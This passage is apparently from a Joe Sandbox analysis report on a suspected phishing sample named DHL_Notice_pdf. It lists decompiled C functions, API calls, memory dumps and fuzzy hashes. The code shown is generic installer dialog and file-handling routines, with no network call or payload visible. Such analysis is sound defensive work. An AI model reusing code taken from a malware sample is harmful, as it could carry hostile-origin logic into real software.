                                                            0x00402296
                                                            0x004022a0
                                                            0x004022a0
                                                            0x004022a3
                                                            0x004022ac
                                                            0x004022af
                                                            0x004022b8
                                                            0x004022be
                                                            0x004022c0
                                                            0x004022ce
                                                            0x004022ce
                                                            0x004022d1
                                                            0x004022d7
                                                            0x004022d7
                                                            0x004022da
                                                            0x004022e0
                                                            0x004022e6
                                                            0x004022fb
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x004022e6
                                                            0x004022f1
                                                            0x00402c2d
                                                            0x00402c39

                                                            APIs
                                                            • CoCreateInstance.OLE32(004084E4,?,00000001,004084D4,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 00402229
                                                            Strings
                                                            • C:\Users\user\AppData\Local\Temp, xrefs: 00402269
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.248820039.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.248815920.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.248830182.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.248836994.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.248836994.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.248836994.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.248836994.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.248836994.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.248873061.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_DHL_Notice_pdf.jbxd
                                                            Similarity
                                                            • API ID: CreateInstance
                                                            • String ID: C:\Users\user\AppData\Local\Temp
                                                            • API String ID: 542301482-501415292
                                                            • Opcode ID: 077b7362f6a1d4038be91bf7f4b9e5842d68daf9de23732b557fb751e09ce78c
                                                            • Instruction ID: f110e38d5ccd8909b9e85e2ea6b1342c5fae2602ce40754bea02e3b472428d32
                                                            • Opcode Fuzzy Hash: 077b7362f6a1d4038be91bf7f4b9e5842d68daf9de23732b557fb751e09ce78c
                                                            • Instruction Fuzzy Hash: BC411771A00209EFCF40DFE4C989E9D7BB5BF49304B20456AF505EB2D1DB799981CB94
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 0040290B Relevance: 1.5, APIs: 1, Instructions: 30fileCOMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 39%
                                                            			E0040290B(short __ebx, short* __edi) {
				void* _t21;

				if(FindFirstFileW(E00402DA6(2), _t21 - 0x2dc) != 0xffffffff) {
					E004065AF( *((intOrPtr*)(_t21 - 0xc)), _t8);
					_push(_t21 - 0x2b0);
					_push(__edi);
					E00406668();
				} else {
					 *((short*)( *((intOrPtr*)(_t21 - 0xc)))) = __ebx;
					 *__edi = __ebx;
					 *((intOrPtr*)(_t21 - 4)) = 1;
				}
				 *0x42a2e8 =  *0x42a2e8 +  *((intOrPtr*)(_t21 - 4));
				return 0;
			}




                                                            0x00402923
                                                            0x0040293e
                                                            0x00402949
                                                            0x0040294a
                                                            0x00402a94
                                                            0x00402925
                                                            0x00402928
                                                            0x0040292b
                                                            0x0040292e
                                                            0x0040292e
                                                            0x00402c2d
                                                            0x00402c39

                                                            APIs
                                                            • FindFirstFileW.KERNEL32(00000000,?,00000002), ref: 0040291A
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.248820039.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.248815920.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.248830182.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.248836994.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.248836994.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.248836994.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.248836994.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.248836994.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.248873061.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_DHL_Notice_pdf.jbxd
                                                            Similarity
                                                            • API ID: FileFindFirst
                                                            • String ID:
                                                            • API String ID: 1974802433-0
                                                            • Opcode ID: b2f27a8a5f9b700f187602bb898c1293859530a573ae52e9df8ecc114fa703e5
                                                            • Instruction ID: b84bdfeecc4e8c0803ac0e71b8711fc90ef1d688bdc4be786e729a17b55638d3
                                                            • Opcode Fuzzy Hash: b2f27a8a5f9b700f187602bb898c1293859530a573ae52e9df8ecc114fa703e5
                                                            • Instruction Fuzzy Hash: 47F05E71A04105EBDB01DBB4EE49AAEB378EF14314F60457BE101F21D0E7B88E529B29
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00405031 Relevance: 63.5, APIs: 33, Strings: 3, Instructions: 489windowmemoryCOMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 96%
                                                            			E00405031(struct HWND__* _a4, int _a8, signed int _a12, int _a16) {
				struct HWND__* _v8;
				struct HWND__* _v12;
				long _v16;
				signed int _v20;
				signed int _v24;
				intOrPtr _v28;
				signed char* _v32;
				int _v36;
				signed int _v44;
				int _v48;
				signed int* _v60;
				signed char* _v64;
				signed int _v68;
				long _v72;
				void* _v76;
				intOrPtr _v80;
				intOrPtr _v84;
				void* _v88;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t198;
				intOrPtr _t201;
				long _t207;
				signed int _t211;
				signed int _t222;
				void* _t225;
				void* _t226;
				int _t232;
				long _t237;
				long _t238;
				signed int _t239;
				signed int _t245;
				signed int _t247;
				signed char _t248;
				signed char _t254;
				void* _t258;
				void* _t260;
				signed char* _t278;
				signed char _t279;
				long _t284;
				struct HWND__* _t291;
				signed int* _t292;
				int _t293;
				long _t294;
				signed int _t295;
				void* _t297;
				long _t298;
				int _t299;
				signed int _t300;
				signed int _t303;
				signed int _t311;
				signed char* _t319;
				int _t324;
				void* _t326;

				_t291 = _a4;
				_v12 = GetDlgItem(_t291, 0x3f9);
				_v8 = GetDlgItem(_t291, 0x408);
				_t326 = SendMessageW;
				_v24 =  *0x42a288;
				_v28 =  *0x42a270 + 0x94;
				if(_a8 != 0x110) {
					L23:
					if(_a8 != 0x405) {
						_t301 = _a16;
					} else {
						_a12 = 0;
						_t301 = 1;
						_a8 = 0x40f;
						_a16 = 1;
					}
					if(_a8 == 0x4e || _a8 == 0x413) {
						_v16 = _t301;
						if(_a8 == 0x413 ||  *((intOrPtr*)(_t301 + 4)) == 0x408) {
							if(( *0x42a279 & 0x00000002) != 0) {
								L41:
								if(_v16 != 0) {
									_t237 = _v16;
									if( *((intOrPtr*)(_t237 + 8)) == 0xfffffe3d) {
										SendMessageW(_v8, 0x419, 0,  *(_t237 + 0x5c));
									}
									_t238 = _v16;
									if( *((intOrPtr*)(_t238 + 8)) == 0xfffffe39) {
										_t301 = _v24;
										_t239 =  *(_t238 + 0x5c);
										if( *((intOrPtr*)(_t238 + 0xc)) != 2) {
											 *(_t239 * 0x818 + _t301 + 8) =  *(_t239 * 0x818 + _t301 + 8) & 0xffffffdf;
										} else {
											 *(_t239 * 0x818 + _t301 + 8) =  *(_t239 * 0x818 + _t301 + 8) | 0x00000020;
										}
									}
								}
								goto L48;
							}
							if(_a8 == 0x413) {
								L33:
								_t301 = 0 | _a8 != 0x00000413;
								_t245 = E00404F7F(_v8, _a8 != 0x413);
								_t295 = _t245;
								if(_t295 >= 0) {
									_t94 = _v24 + 8; // 0x8
									_t301 = _t245 * 0x818 + _t94;
									_t247 =  *_t301;
									if((_t247 & 0x00000010) == 0) {
										if((_t247 & 0x00000040) == 0) {
											_t248 = _t247 ^ 0x00000001;
										} else {
											_t254 = _t247 ^ 0x00000080;
											if(_t254 >= 0) {
												_t248 = _t254 & 0x000000fe;
											} else {
												_t248 = _t254 | 0x00000001;
											}
										}
										 *_t301 = _t248;
										E0040117D(_t295);
										_a12 = _t295 + 1;
										_a16 =  !( *0x42a278) >> 0x00000008 & 0x00000001;
										_a8 = 0x40f;
									}
								}
								goto L41;
							}
							_t301 = _a16;
							if( *((intOrPtr*)(_a16 + 8)) != 0xfffffffe) {
								goto L41;
							}
							goto L33;
						} else {
							goto L48;
						}
					} else {
						L48:
						if(_a8 != 0x111) {
							L56:
							if(_a8 == 0x200) {
								SendMessageW(_v8, 0x200, 0, 0);
							}
							if(_a8 == 0x40b) {
								_t225 =  *0x42372c;
								if(_t225 != 0) {
									ImageList_Destroy(_t225);
								}
								_t226 =  *0x423740;
								if(_t226 != 0) {
									GlobalFree(_t226);
								}
								 *0x42372c = 0;
								 *0x423740 = 0;
								 *0x42a2c0 = 0;
							}
							if(_a8 != 0x40f) {
								L90:
								if(_a8 == 0x420 && ( *0x42a279 & 0x00000001) != 0) {
									_t324 = (0 | _a16 == 0x00000020) << 3;
									ShowWindow(_v8, _t324);
									ShowWindow(GetDlgItem(_a4, 0x3fe), _t324);
								}
								goto L93;
							} else {
								E004011EF(_t301, 0, 0);
								_t198 = _a12;
								if(_t198 != 0) {
									if(_t198 != 0xffffffff) {
										_t198 = _t198 - 1;
									}
									_push(_t198);
									_push(8);
									E00404FFF();
								}
								if(_a16 == 0) {
									L75:
									E004011EF(_t301, 0, 0);
									_v36 =  *0x423740;
									_t201 =  *0x42a288;
									_v64 = 0xf030;
									_v24 = 0;
									if( *0x42a28c <= 0) {
										L86:
										if( *0x42a31e == 0x400) {
											InvalidateRect(_v8, 0, 1);
										}
										if( *((intOrPtr*)( *0x42923c + 0x10)) != 0) {
											E00404F3A(0x3ff, 0xfffffffb, E00404F52(5));
										}
										goto L90;
									}
									_t292 = _t201 + 8;
									do {
										_t207 =  *((intOrPtr*)(_v36 + _v24 * 4));
										if(_t207 != 0) {
											_t303 =  *_t292;
											_v72 = _t207;
											_v76 = 8;
											if((_t303 & 0x00000001) != 0) {
												_v76 = 9;
												_v60 =  &(_t292[4]);
												_t292[0] = _t292[0] & 0x000000fe;
											}
											if((_t303 & 0x00000040) == 0) {
												_t211 = (_t303 & 0x00000001) + 1;
												if((_t303 & 0x00000010) != 0) {
													_t211 = _t211 + 3;
												}
											} else {
												_t211 = 3;
											}
											_v68 = (_t211 << 0x0000000b | _t303 & 0x00000008) + (_t211 << 0x0000000b | _t303 & 0x00000008) | _t303 & 0x00000020;
											SendMessageW(_v8, 0x1102, (_t303 >> 0x00000005 & 0x00000001) + 1, _v72);
											SendMessageW(_v8, 0x113f, 0,  &_v76);
										}
										_v24 = _v24 + 1;
										_t292 =  &(_t292[0x206]);
									} while (_v24 <  *0x42a28c);
									goto L86;
								} else {
									_t293 = E004012E2( *0x423740);
									E00401299(_t293);
									_t222 = 0;
									_t301 = 0;
									if(_t293 <= 0) {
										L74:
										SendMessageW(_v12, 0x14e, _t301, 0);
										_a16 = _t293;
										_a8 = 0x420;
										goto L75;
									} else {
										goto L71;
									}
									do {
										L71:
										if( *((intOrPtr*)(_v28 + _t222 * 4)) != 0) {
											_t301 = _t301 + 1;
										}
										_t222 = _t222 + 1;
									} while (_t222 < _t293);
									goto L74;
								}
							}
						}
						if(_a12 != 0x3f9 || _a12 >> 0x10 != 1) {
							goto L93;
						} else {
							_t232 = SendMessageW(_v12, 0x147, 0, 0);
							if(_t232 == 0xffffffff) {
								goto L93;
							}
							_t294 = SendMessageW(_v12, 0x150, _t232, 0);
							if(_t294 == 0xffffffff ||  *((intOrPtr*)(_v28 + _t294 * 4)) == 0) {
								_t294 = 0x20;
							}
							E00401299(_t294);
							SendMessageW(_a4, 0x420, 0, _t294);
							_a12 = _a12 | 0xffffffff;
							_a16 = 0;
							_a8 = 0x40f;
							goto L56;
						}
					}
				} else {
					_v36 = 0;
					_v20 = 2;
					 *0x42a2c0 = _t291;
					 *0x423740 = GlobalAlloc(0x40,  *0x42a28c << 2);
					_t258 = LoadImageW( *0x42a260, 0x6e, 0, 0, 0, 0);
					 *0x423734 =  *0x423734 | 0xffffffff;
					_t297 = _t258;
					 *0x42373c = SetWindowLongW(_v8, 0xfffffffc, E0040563E);
					_t260 = ImageList_Create(0x10, 0x10, 0x21, 6, 0);
					 *0x42372c = _t260;
					ImageList_AddMasked(_t260, _t297, 0xff00ff);
					SendMessageW(_v8, 0x1109, 2,  *0x42372c);
					if(SendMessageW(_v8, 0x111c, 0, 0) < 0x10) {
						SendMessageW(_v8, 0x111b, 0x10, 0);
					}
					DeleteObject(_t297);
					_t298 = 0;
					do {
						_t266 =  *((intOrPtr*)(_v28 + _t298 * 4));
						if( *((intOrPtr*)(_v28 + _t298 * 4)) != 0) {
							if(_t298 != 0x20) {
								_v20 = 0;
							}
							SendMessageW(_v12, 0x151, SendMessageW(_v12, 0x143, 0, E004066A5(_t298, 0, _t326, 0, _t266)), _t298);
						}
						_t298 = _t298 + 1;
					} while (_t298 < 0x21);
					_t299 = _a16;
					_push( *((intOrPtr*)(_t299 + 0x30 + _v20 * 4)));
					_push(0x15);
					E004045C4(_a4);
					_push( *((intOrPtr*)(_t299 + 0x34 + _v20 * 4)));
					_push(0x16);
					E004045C4(_a4);
					_t300 = 0;
					_v16 = 0;
					if( *0x42a28c <= 0) {
						L19:
						SetWindowLongW(_v8, 0xfffffff0, GetWindowLongW(_v8, 0xfffffff0) & 0x000000fb);
						goto L20;
					} else {
						_t319 = _v24 + 8;
						_v32 = _t319;
						do {
							_t278 =  &(_t319[0x10]);
							if( *_t278 != 0) {
								_v64 = _t278;
								_t279 =  *_t319;
								_v88 = _v16;
								_t311 = 0x20;
								_v84 = 0xffff0002;
								_v80 = 0xd;
								_v68 = _t311;
								_v44 = _t300;
								_v72 = _t279 & _t311;
								if((_t279 & 0x00000002) == 0) {
									if((_t279 & 0x00000004) == 0) {
										 *( *0x423740 + _t300 * 4) = SendMessageW(_v8, 0x1132, 0,  &_v88);
									} else {
										_v16 = SendMessageW(_v8, 0x110a, 3, _v16);
									}
								} else {
									_v80 = 0x4d;
									_v48 = 1;
									_t284 = SendMessageW(_v8, 0x1132, 0,  &_v88);
									_v36 = 1;
									 *( *0x423740 + _t300 * 4) = _t284;
									_v16 =  *( *0x423740 + _t300 * 4);
								}
							}
							_t300 = _t300 + 1;
							_t319 =  &(_v32[0x818]);
							_v32 = _t319;
						} while (_t300 <  *0x42a28c);
						if(_v36 != 0) {
							L20:
							if(_v20 != 0) {
								E004045F9(_v8);
								goto L23;
							} else {
								ShowWindow(_v12, 5);
								E004045F9(_v12);
								L93:
								return E0040462B(_a8, _a12, _a16);
							}
						}
						goto L19;
					}
				}
			}


























































                                                            0x00405038
                                                            0x00405051
                                                            0x00405056
                                                            0x0040505e
                                                            0x00405064
                                                            0x0040507a
                                                            0x0040507d
                                                            0x004052a8
                                                            0x004052af
                                                            0x004052c3
                                                            0x004052b1
                                                            0x004052b3
                                                            0x004052b6
                                                            0x004052b7
                                                            0x004052be
                                                            0x004052be
                                                            0x004052cf
                                                            0x004052dd
                                                            0x004052e0
                                                            0x004052f6
                                                            0x0040536b
                                                            0x0040536e
                                                            0x00405370
                                                            0x0040537a
                                                            0x00405388
                                                            0x00405388
                                                            0x0040538a
                                                            0x00405394
                                                            0x0040539a
                                                            0x0040539d
                                                            0x004053a0
                                                            0x004053bb
                                                            0x004053a2
                                                            0x004053ac
                                                            0x004053ac
                                                            0x004053a0
                                                            0x00405394
                                                            0x00000000
                                                            0x0040536e
                                                            0x004052fb
                                                            0x00405306
                                                            0x0040530b
                                                            0x00405312
                                                            0x00405317
                                                            0x0040531b
                                                            0x00405326
                                                            0x00405326
                                                            0x0040532a
                                                            0x0040532e
                                                            0x00405332
                                                            0x00405345
                                                            0x00405334
                                                            0x00405334
                                                            0x0040533b
                                                            0x00405341
                                                            0x0040533d
                                                            0x0040533d
                                                            0x0040533d
                                                            0x0040533b
                                                            0x00405349
                                                            0x0040534b
                                                            0x0040535e
                                                            0x00405361
                                                            0x00405364
                                                            0x00405364
                                                            0x0040532e
                                                            0x00000000
                                                            0x0040531b
                                                            0x004052fd
                                                            0x00405304
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x004053be
                                                            0x004053be
                                                            0x004053c5
                                                            0x00405436
                                                            0x0040543e
                                                            0x00405446
                                                            0x00405446
                                                            0x0040544f
                                                            0x00405451
                                                            0x00405458
                                                            0x0040545b
                                                            0x0040545b
                                                            0x00405461
                                                            0x00405468
                                                            0x0040546b
                                                            0x0040546b
                                                            0x00405471
                                                            0x00405477
                                                            0x0040547d
                                                            0x0040547d
                                                            0x0040548a
                                                            0x004055eb
                                                            0x004055f2
                                                            0x0040560f
                                                            0x00405615
                                                            0x00405627
                                                            0x00405627
                                                            0x00000000
                                                            0x00405490
                                                            0x00405492
                                                            0x00405497
                                                            0x0040549c
                                                            0x004054a1
                                                            0x004054a3
                                                            0x004054a3
                                                            0x004054a4
                                                            0x004054a5
                                                            0x004054a7
                                                            0x004054a7
                                                            0x004054af
                                                            0x004054f0
                                                            0x004054f2
                                                            0x00405502
                                                            0x00405505
                                                            0x0040550a
                                                            0x00405511
                                                            0x00405514
                                                            0x004055b6
                                                            0x004055bf
                                                            0x004055c7
                                                            0x004055c7
                                                            0x004055d5
                                                            0x004055e6
                                                            0x004055e6
                                                            0x00000000
                                                            0x004055d5
                                                            0x0040551a
                                                            0x0040551d
                                                            0x00405523
                                                            0x00405528
                                                            0x0040552a
                                                            0x0040552c
                                                            0x00405532
                                                            0x00405539
                                                            0x0040553e
                                                            0x00405545
                                                            0x00405548
                                                            0x00405548
                                                            0x0040554f
                                                            0x0040555b
                                                            0x0040555f
                                                            0x00405561
                                                            0x00405561
                                                            0x00405551
                                                            0x00405553
                                                            0x00405553
                                                            0x00405581
                                                            0x0040558d
                                                            0x0040559c
                                                            0x0040559c
                                                            0x0040559e
                                                            0x004055a1
                                                            0x004055aa
                                                            0x00000000
                                                            0x004054b1
                                                            0x004054bc
                                                            0x004054bf
                                                            0x004054c4
                                                            0x004054c6
                                                            0x004054ca
                                                            0x004054da
                                                            0x004054e4
                                                            0x004054e6
                                                            0x004054e9
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x004054cc
                                                            0x004054cc
                                                            0x004054d2
                                                            0x004054d4
                                                            0x004054d4
                                                            0x004054d5
                                                            0x004054d6
                                                            0x00000000
                                                            0x004054cc
                                                            0x004054af
                                                            0x0040548a
                                                            0x004053cd
                                                            0x00000000
                                                            0x004053e3
                                                            0x004053ed
                                                            0x004053f2
                                                            0x00000000
                                                            0x00000000
                                                            0x00405404
                                                            0x00405409
                                                            0x00405415
                                                            0x00405415
                                                            0x00405417
                                                            0x00405426
                                                            0x00405428
                                                            0x0040542c
                                                            0x0040542f
                                                            0x00000000
                                                            0x0040542f
                                                            0x004053cd
                                                            0x00405083
                                                            0x00405088
                                                            0x00405091
                                                            0x00405098
                                                            0x004050aa
                                                            0x004050b5
                                                            0x004050bb
                                                            0x004050c9
                                                            0x004050dd
                                                            0x004050e2
                                                            0x004050ef
                                                            0x004050f4
                                                            0x0040510a
                                                            0x0040511b
                                                            0x00405128
                                                            0x00405128
                                                            0x0040512b
                                                            0x00405131
                                                            0x00405133
                                                            0x00405136
                                                            0x0040513b
                                                            0x00405140
                                                            0x00405142
                                                            0x00405142
                                                            0x00405162
                                                            0x00405162
                                                            0x00405164
                                                            0x00405165
                                                            0x0040516a
                                                            0x00405170
                                                            0x00405174
                                                            0x00405179
                                                            0x00405181
                                                            0x00405185
                                                            0x0040518a
                                                            0x0040518f
                                                            0x00405197
                                                            0x0040519a
                                                            0x0040526a
                                                            0x0040527d
                                                            0x00000000
                                                            0x004051a0
                                                            0x004051a3
                                                            0x004051a6
                                                            0x004051a9
                                                            0x004051a9
                                                            0x004051af
                                                            0x004051b8
                                                            0x004051bb
                                                            0x004051bf
                                                            0x004051c2
                                                            0x004051c5
                                                            0x004051ce
                                                            0x004051d7
                                                            0x004051da
                                                            0x004051dd
                                                            0x004051e0
                                                            0x0040521e
                                                            0x00405249
                                                            0x00405220
                                                            0x0040522f
                                                            0x0040522f
                                                            0x004051e2
                                                            0x004051e5
                                                            0x004051f3
                                                            0x004051fd
                                                            0x00405205
                                                            0x0040520c
                                                            0x00405217
                                                            0x00405217
                                                            0x004051e0
                                                            0x0040524f
                                                            0x00405250
                                                            0x0040525c
                                                            0x0040525c
                                                            0x00405268
                                                            0x00405283
                                                            0x00405286
                                                            0x004052a3
                                                            0x00000000
                                                            0x00405288
                                                            0x0040528d
                                                            0x00405296
                                                            0x00405629
                                                            0x0040563b
                                                            0x0040563b
                                                            0x00405286
                                                            0x00000000
                                                            0x00405268
                                                            0x0040519a

                                                            APIs
                                                            • GetDlgItem.USER32 ref: 00405049
                                                            • GetDlgItem.USER32 ref: 00405054
                                                            • GlobalAlloc.KERNEL32(00000040,?), ref: 0040509E
                                                            • LoadImageW.USER32 ref: 004050B5
                                                            • SetWindowLongW.USER32 ref: 004050CE
                                                            • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 004050E2
                                                            • ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 004050F4
                                                            • SendMessageW.USER32(?,00001109,00000002), ref: 0040510A
                                                            • SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00405116
                                                            • SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00405128
                                                            • DeleteObject.GDI32(00000000), ref: 0040512B
                                                            • SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00405156
                                                            • SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00405162
                                                            • SendMessageW.USER32(?,00001132,00000000,?), ref: 004051FD
                                                            • SendMessageW.USER32(?,0000110A,00000003,00000110), ref: 0040522D
                                                              • Part of subcall function 004045F9: SendMessageW.USER32(00000028,?,00000001,00404424), ref: 00404607
                                                            • SendMessageW.USER32(?,00001132,00000000,?), ref: 00405241
                                                            • GetWindowLongW.USER32(?,000000F0), ref: 0040526F
                                                            • SetWindowLongW.USER32 ref: 0040527D
                                                            • ShowWindow.USER32(?,00000005), ref: 0040528D
                                                            • SendMessageW.USER32(?,00000419,00000000,?), ref: 00405388
                                                            • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 004053ED
                                                            • SendMessageW.USER32(?,00000150,00000000,00000000), ref: 00405402
                                                            • SendMessageW.USER32(?,00000420,00000000,00000020), ref: 00405426
                                                            • SendMessageW.USER32(?,00000200,00000000,00000000), ref: 00405446
                                                            • ImageList_Destroy.COMCTL32(?), ref: 0040545B
                                                            • GlobalFree.KERNEL32 ref: 0040546B
                                                            • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 004054E4
                                                            • SendMessageW.USER32(?,00001102,?,?), ref: 0040558D
                                                            • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 0040559C
                                                            • InvalidateRect.USER32(?,00000000,00000001), ref: 004055C7
                                                            • ShowWindow.USER32(?,00000000), ref: 00405615
                                                            • GetDlgItem.USER32 ref: 00405620
                                                            • ShowWindow.USER32(00000000), ref: 00405627
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.248820039.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.248815920.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.248830182.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.248836994.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.248836994.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.248836994.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.248836994.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.248836994.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.248873061.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_DHL_Notice_pdf.jbxd
                                                            Similarity
                                                            • API ID: MessageSend$Window$Image$ItemList_LongShow$Global$AllocCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                            • String ID: $M$N
                                                            • API String ID: 2564846305-813528018
                                                            • Opcode ID: de07a9e9a0be4199ac2fb0f6085adc1098bb242521470954e30eab12cbe79057
                                                            • Instruction ID: a1eb65f7683e17450fca8d4cb4c1055b074660be5b1b810df034ff690b7f681c
                                                            • Opcode Fuzzy Hash: de07a9e9a0be4199ac2fb0f6085adc1098bb242521470954e30eab12cbe79057
                                                            • Instruction Fuzzy Hash: 2A025CB0900609EFDF20DF65CD45AAE7BB5FB44315F10817AEA10BA2E1D7798A52CF18
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00404783 Relevance: 37.0, APIs: 19, Strings: 2, Instructions: 204windowstringCOMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 91%
                                                            			E00404783(struct HWND__* _a4, int _a8, unsigned int _a12, WCHAR* _a16) {
				intOrPtr _v8;
				int _v12;
				void* _v16;
				struct HWND__* _t56;
				signed int _t75;
				signed short* _t76;
				signed short* _t78;
				long _t92;
				int _t103;
				signed int _t110;
				intOrPtr _t113;
				WCHAR* _t114;
				signed int* _t116;
				WCHAR* _t117;
				struct HWND__* _t118;

				if(_a8 != 0x110) {
					if(_a8 != 0x111) {
						L13:
						if(_a8 != 0x4e) {
							if(_a8 == 0x40b) {
								 *0x421714 =  *0x421714 + 1;
							}
							L27:
							_t114 = _a16;
							L28:
							return E0040462B(_a8, _a12, _t114);
						}
						_t56 = GetDlgItem(_a4, 0x3e8);
						_t114 = _a16;
						if( *((intOrPtr*)(_t114 + 8)) == 0x70b &&  *((intOrPtr*)(_t114 + 0xc)) == 0x201) {
							_t103 =  *((intOrPtr*)(_t114 + 0x1c));
							_t113 =  *((intOrPtr*)(_t114 + 0x18));
							_v12 = _t103;
							_v16 = _t113;
							_v8 = 0x428200;
							if(_t103 - _t113 < 0x800) {
								SendMessageW(_t56, 0x44b, 0,  &_v16);
								SetCursor(LoadCursorW(0, 0x7f02));
								_push(1);
								E00404A32(_a4, _v8);
								SetCursor(LoadCursorW(0, 0x7f00));
								_t114 = _a16;
							}
						}
						if( *((intOrPtr*)(_t114 + 8)) != 0x700 ||  *((intOrPtr*)(_t114 + 0xc)) != 0x100) {
							goto L28;
						} else {
							if( *((intOrPtr*)(_t114 + 0x10)) == 0xd) {
								SendMessageW( *0x42a268, 0x111, 1, 0);
							}
							if( *((intOrPtr*)(_t114 + 0x10)) == 0x1b) {
								SendMessageW( *0x42a268, 0x10, 0, 0);
							}
							return 1;
						}
					}
					if(_a12 >> 0x10 != 0 ||  *0x421714 != 0) {
						goto L27;
					} else {
						_t116 =  *0x422720 + 0x14;
						if(( *_t116 & 0x00000020) == 0) {
							goto L27;
						}
						 *_t116 =  *_t116 & 0xfffffffe | SendMessageW(GetDlgItem(_a4, 0x40a), 0xf0, 0, 0) & 0x00000001;
						E004045E6(SendMessageW(GetDlgItem(_a4, 0x40a), 0xf0, 0, 0) & 0x00000001);
						E00404A0E();
						goto L13;
					}
				}
				_t117 = _a16;
				_t75 =  *(_t117 + 0x30);
				if(_t75 < 0) {
					_t75 =  *( *0x42923c - 4 + _t75 * 4);
				}
				_t76 =  *0x42a298 + _t75 * 2;
				_t110 =  *_t76 & 0x0000ffff;
				_a8 = _t110;
				_t78 =  &(_t76[1]);
				_a16 = _t78;
				_v16 = _t78;
				_v12 = 0;
				_v8 = E00404734;
				if(_t110 != 2) {
					_v8 = E004046FA;
				}
				_push( *((intOrPtr*)(_t117 + 0x34)));
				_push(0x22);
				E004045C4(_a4);
				_push( *((intOrPtr*)(_t117 + 0x38)));
				_push(0x23);
				E004045C4(_a4);
				CheckDlgButton(_a4, (0 | ( !( *(_t117 + 0x14)) >> 0x00000005 & 0x00000001 |  *(_t117 + 0x14) & 0x00000001) == 0x00000000) + 0x40a, 1);
				E004045E6( !( *(_t117 + 0x14)) >> 0x00000005 & 0x00000001 |  *(_t117 + 0x14) & 0x00000001);
				_t118 = GetDlgItem(_a4, 0x3e8);
				E004045F9(_t118);
				SendMessageW(_t118, 0x45b, 1, 0);
				_t92 =  *( *0x42a270 + 0x68);
				if(_t92 < 0) {
					_t92 = GetSysColor( ~_t92);
				}
				SendMessageW(_t118, 0x443, 0, _t92);
				SendMessageW(_t118, 0x445, 0, 0x4010000);
				SendMessageW(_t118, 0x435, 0, lstrlenW(_a16));
				 *0x421714 = 0;
				SendMessageW(_t118, 0x449, _a8,  &_v16);
				 *0x421714 = 0;
				return 0;
			}


















                                                            0x00404795
                                                            0x004048c2
                                                            0x0040491f
                                                            0x00404923
                                                            0x004049f0
                                                            0x004049f2
                                                            0x004049f2
                                                            0x004049f8
                                                            0x004049f8
                                                            0x004049fb
